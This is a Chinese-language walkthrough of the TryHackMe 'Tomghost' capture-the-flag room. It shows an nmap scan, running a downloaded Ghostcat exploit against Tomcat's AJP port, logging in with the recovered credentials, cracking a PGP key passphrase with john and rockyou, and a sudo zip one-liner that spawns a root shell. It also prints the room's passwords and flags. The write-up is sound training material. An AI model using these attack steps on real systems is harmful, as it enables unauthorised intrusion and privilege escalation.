[Day16] THM Tomghost

• 网址 : https://tryhackme.com/room/tomghost
• IP : 10.10.9.138

扫描

• nmap -A 10.10.9.138
  • 
  • 有开的 port
    • 22 SSH 7.2ps
    • 53 tcpwarpped
    • 8009 AJP13 1.3
    • 8080 Tomcat 9.0.30

寻找 Exploit

• 使用 searchsploit 搜寻 AJP
  • searchsploit AJP
  • 可以找到 Apache Tomcat - AJP 'Ghostcat File Read/Inclusion
    • https://www.exploit-db.com/exploits/48143

Exploit

• 下载脚本
  • wget https://www.exploit-db.com/download/48143
  • mv 48143 48143.py
• 执行指令
  • python 48143.py
  • 
  • 就直接喷出帐号密码ㄌ
    • 帐号 : skyfuck
    • 密码 : 8730281lkjlkjdqlksalks

SSH

• ssh [email protected]
• 发现家目录里面有两个档案
  • 
  • 先抓出来
    • scp -r [email protected]:/home/skyfuck .
• 在 /home/merlin 发现 user.txt
  • THM{GhostCat_1s_so_cr4sy}

暴力破解 PGP

• 我们刚刚下载到一个 asc 档案 跟一个 pgp 档案

  • 先试着用 file 观察他们是什麽
  • 
  • 大概可以了解到
    • .pgp 是加密後ㄉ东西
    • .asc 的是 private key

• pgp 转 john

  • gpg2john tryhackme.asc > john_gpg
  • 备注 : gpg 是开源版本的 pgp
    • ref :　https://zh.wikipedia.org/wiki/PGP
  • 我们要破的是 .asc 的 private key 档案求密码

• 用 john 爆破，With rockyou.txt

  • john john_gpg --wordlist=/opt/rockyou.txt
  • 
  • 破出密码为 alexandru

• gpg --decrypt credential.pgp

  • 输入密码
  • 
    • 取得 merlin:asuyusdoiuqoilkda312j31k2j123j1g23g12k3g12kj3gk12jg3k12j3kj123j

提权

• su merlin
  • 输入密码
• sudo -l
  • (root : root) NOPASSWD: /usr/bin/zip
  • 发现有 zip 的 sudo 权限
• 到 GTFOBins 找 zip 提权方法
  • 可以 sudo 的
    • TF=$(mktemp -u)
    • sudo zip $TF /etc/hosts -T -TT 'sh #'
• 提权成功
  • 
  • root.txt : THM{Z1P_1S_FAKE}